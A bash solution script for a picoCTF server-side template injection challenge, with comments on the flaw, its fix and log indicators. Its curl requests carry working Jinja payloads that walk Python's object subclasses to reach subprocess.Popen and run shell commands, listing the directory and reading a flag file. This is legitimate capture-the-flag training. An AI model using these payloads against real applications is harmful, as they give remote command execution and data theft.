#!/usr/bin/env bash
#
# Replays three form POSTs against the picoCTF challenge's /announce endpoint.
# Each request puts a Jinja-style `{{ ... }}` expression in the `content`
# field. Seeing the evaluated result in the response means the server treats
# the submitted text as template source, not as data (server-side template
# injection).
#
# Review notes:
#   - The fix on the server side is to pass user input to the template as a
#     context variable and never compile it as a template string.
#   - In logs, requests of this kind stand out by `{{`, `__class__`, `mro` and
#     `__subclasses__` appearing inside a form field.
#   - NOTE(review): the Referer/Origin headers use port 49252 while URL uses
#     port 57160. Presumably they were copied from a different challenge
#     instance; confirm whether the server checks them at all.

URL="http://rescued-float.picoctf.net:57160/announce"

#######################################
# POST one value as the url-encoded `content` form field.
# Globals:   URL (read)
# Arguments: $1 - text to submit as `content`
# Outputs:   the HTTP response body on stdout (curl default)
# Returns:   curl's exit status
#######################################
post_content() {
  local payload=$1
  local -a request=(
    -X POST
    -H 'Referer: http://rescued-float.picoctf.net:49252/'
    -H 'Origin: http://rescued-float.picoctf.net:49252'
    -H "Content-Type: application/x-www-form-urlencoded"
    --data-urlencode "content=${payload}"
  )
  curl "${request[@]}" "$URL"
}

# Request 1: have the template echo the subclasses of `object`
# (''.__class__.mro()[1] is `object` for a str).
post_content "{{ ''.__class__.mro()[1].__subclasses__() }}"

# Find Popen
# The original note above sits between request 1 and request 2. Index 356 in
# the next two requests is presumably the position of subprocess.Popen in
# request 1's output, since the call shape (shell=True, stdout=-1,
# .communicate()) matches it. The index is specific to the target's Python
# build and is not a stable value.

# Request 2: directory listing through the class at index 356.
post_content "{{ ''.__class__.mro()[1].__subclasses__()[356]('ls -lah',shell=True,stdout=-1).communicate()[0].strip() }}"

# Request 3: read the `flag` file and keep only the picoCTF{...} token from
# the response.
post_content "{{ ''.__class__.mro()[1].__subclasses__()[356]('cat flag',shell=True,stdout=-1).communicate()[0].strip() }}" \
  | grep --only-matching -E 'picoCTF\{.*\}'